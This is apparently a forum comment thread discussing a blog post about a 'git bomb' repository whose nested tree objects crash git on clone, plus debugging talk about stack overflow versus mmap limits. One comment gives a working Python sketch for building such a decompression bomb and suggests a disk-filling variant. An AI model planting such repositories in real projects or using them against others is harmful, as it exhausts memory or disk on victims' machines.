1. 42
  1.  

  2. 4

    This is a rather interesting problem. On the one hand, it means git can compress this kind of content very well. On the other hand, it means any algorithm that can compress this well (like git) can also be made to produce such a decompression bomb.

    I think Level 2 of this repo would be a version that doesn’t nuke the memory but nukes the disk instead…

    1. 16

      You could definitely do this! Just keep width ^ depth at a reasonable value and make blob_body large. Some code to make your own git bomb is here: https://github.com/Katee/git-bomb#readme
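
      For intuition, here’s a rough Python sketch of that construction (my own, modeled on the idea behind the linked git-bomb script, not copied from it): build one blob, then `depth` levels of trees whose `width` entries all point at the same child object, so checking out the root expands to width ^ depth copies of blob_body.

      ```python
      import hashlib
      import os
      import zlib

      def git_hash(obj_type, body):
          # git object id = SHA-1 over "<type> <size>\0" + body
          data = obj_type.encode() + b" " + str(len(body)).encode() + b"\0" + body
          return hashlib.sha1(data).hexdigest(), data

      def write_object(repo, obj_type, body):
          # store a loose object at .git/objects/<first 2 hex chars>/<rest>
          sha, data = git_hash(obj_type, body)
          path = os.path.join(repo, ".git", "objects", sha[:2], sha[2:])
          os.makedirs(os.path.dirname(path), exist_ok=True)
          with open(path, "wb") as f:
              f.write(zlib.compress(data))
          return sha

      def make_bomb(repo, width=10, depth=10, blob_body=b"one laugh\n"):
          # one blob, then `depth` levels of trees whose `width` entries all
          # point at the same child object (width <= 10 keeps the single-digit
          # names f0..f9 in the sorted order git requires for tree entries)
          sha = write_object(repo, "blob", blob_body)
          mode = b"100644"                     # bottom level: file entries
          for _ in range(depth):
              entries = b"".join(
                  mode + b" f" + str(i).encode() + b"\0" + bytes.fromhex(sha)
                  for i in range(width))
              sha = write_object(repo, "tree", entries)
              mode = b"40000"                  # inner levels: tree entries
          # checking out this root tree expands width ** depth blobs
          return sha
      ```

      The repo on disk stays tiny because every level is a handful of objects; the blow-up only happens when git tries to materialize the checkout.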

      1. 6

        (Worth highlighting here that @kate is the author of this blog post.)

    2. 3

      “This repo has 15,000 nested tree objects. On my laptop this ends up blowing up the stack.”

      Where is the evidence for a stack overflow?

      Perhaps this instead runs into git’s behaviour of mmapping files rather than using open/read/write (because on Linux, mmap is considered faster)? mmap address space is not infinite.

      1. 13

        If you run the git clone under GDB you can see where it fails: unpack_trees gets called in a mutually recursive loop with unpack_callback.

        It’s possible to design git repos that hit the mmap limit, but that’s not what is happening in this particular case.
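
        To see why deep nesting alone exhausts a stack, here’s a toy Python analogue of that mutual recursion (the names are borrowed from git’s functions purely for illustration; this is not git’s actual code):

        ```python
        import sys

        def unpack_tree(depth):
            # stand-in for git's unpack_trees(): process one tree level
            if depth == 0:
                return 0
            return 1 + unpack_callback(depth)

        def unpack_callback(depth):
            # stand-in for unpack_callback(): descend into the nested subtree
            return unpack_tree(depth - 1)

        sys.setrecursionlimit(200)      # Python's analogue of a small C stack
        try:
            unpack_tree(15_000)         # 15,000 nested trees, as in the repo
        except RecursionError:
            print("stack exhausted before reaching the bottom of the tree")
        ```

        Python turns this into a catchable RecursionError; C just keeps pushing frames until the stack guard page is hit, which is exactly a segfault.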

        1. 2

          Thanks for clarifying!

        2. 9

          Just after the bit you quoted is the word “segfault”. Running out of address space and having mmap fail should not normally show up as a segfault (unless the software’s author is careless enough to ignore the return value and dereference MAP_FAILED). It is likely that the article’s author looked at the address of the faulting access and confirmed that it was slightly out of bounds of the stack mapping; that is not hard to check with gdb or lldb.
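
          A quick illustration of that point, using Python’s mmap wrapper as a stand-in for the C call: an impossibly large anonymous mapping fails with a clean error, because the wrapper checks for MAP_FAILED instead of dereferencing it.

          ```python
          import mmap

          # Request an anonymous mapping of 2**60 bytes -- far beyond the
          # roughly 2**47-byte user address space on 64-bit Linux, so the
          # underlying mmap() call must fail.
          try:
              mmap.mmap(-1, 1 << 60)
          except (OSError, ValueError) as e:
              # The C mmap() returned MAP_FAILED; the wrapper checks for it
              # and raises instead of touching the bogus pointer: no segfault.
              print("mmap failed cleanly:", e)
          ```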